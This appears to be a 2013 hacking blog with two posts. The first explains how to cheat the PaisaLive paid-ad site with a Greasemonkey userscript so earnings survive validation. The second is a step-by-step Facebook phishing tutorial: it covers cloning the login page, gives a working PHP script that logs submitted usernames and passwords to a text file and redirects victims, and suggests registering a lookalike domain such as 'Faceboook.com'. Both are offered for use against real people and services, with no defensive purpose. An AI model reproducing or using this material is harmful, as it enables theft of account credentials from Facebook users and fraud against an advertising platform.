Definition List

Wednesday, 19 June 2013

Paisalive Hack

Hack paisalive by greasemonkey script used in mozila.

Paisalive is a very legal and paid site here on this site you can earn just for viewing ads .But the problem is that you can not earn more by viewing ads.They also give spacial promotion offers but these are time consuming system and you have to sign up for earn .If you not sign up your account is credited but the amount is cut during validation process .Now i give a very useful trick for earn more on Paisalive.

Earn 1000 minimum on paisalive  earning can be increase tih depend on your hard working.

Step by Step guide.

Step1.

Register to paisalive here:-

sign up in paisalive for online earning

Step2.

Download Greasemonkey addon for mozila firefox .

Step3.

Download paisalive user scrip.org from here.

Step3.

Now you almost done just login to your paisalive inbox page here in top right corner you will see a tab like this show in picture below.

 

click on this it will open a new window now wait until last page surfed after this close this tag and reload your inbox page.you can see your earning increasing .


Using this script your balance is not educed after validation.So enjoy it



 

 

 



Saturday, 8 June 2013

Facebook hack

Hack facebook by makeing a fake page.

I will give you step wise instruction to make page that look like as same as facebook  login page.

Step:-1

first open the web facebook login page in your browser.

Step:-2

right click on the page empty area and  click on view soruceor in some browser it may be look as view soruce code.Copy that code in your notepad.

Step:-3

Change some text a given under find action="http" and replace it with action="login.php"

and method="post" replace it method="get".Save this file as with extension .html.

Step:-4

Now make a login method php script which is:

<?php
header ('Location: http://facebook.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

location url can be changed it depend on your choice where you want to send the user when he click login on your page.

Step:-5

Now register a domain on any hosting website and choose a domain name must look  as same as Facebook.com some difference should be exist in your url to make it unique .

an example:-Faceboook.com

Step:-6

Now go to your control panel of hosting and in file manger upload two files you make .then launch it.you almost done.

Final step:-

User who login by your fake page is now hacked by you username and password of this user is save in your log.txt file in your hosting.

Now enjoy it and hacked any page with this tricks.For more tricks comment on this post.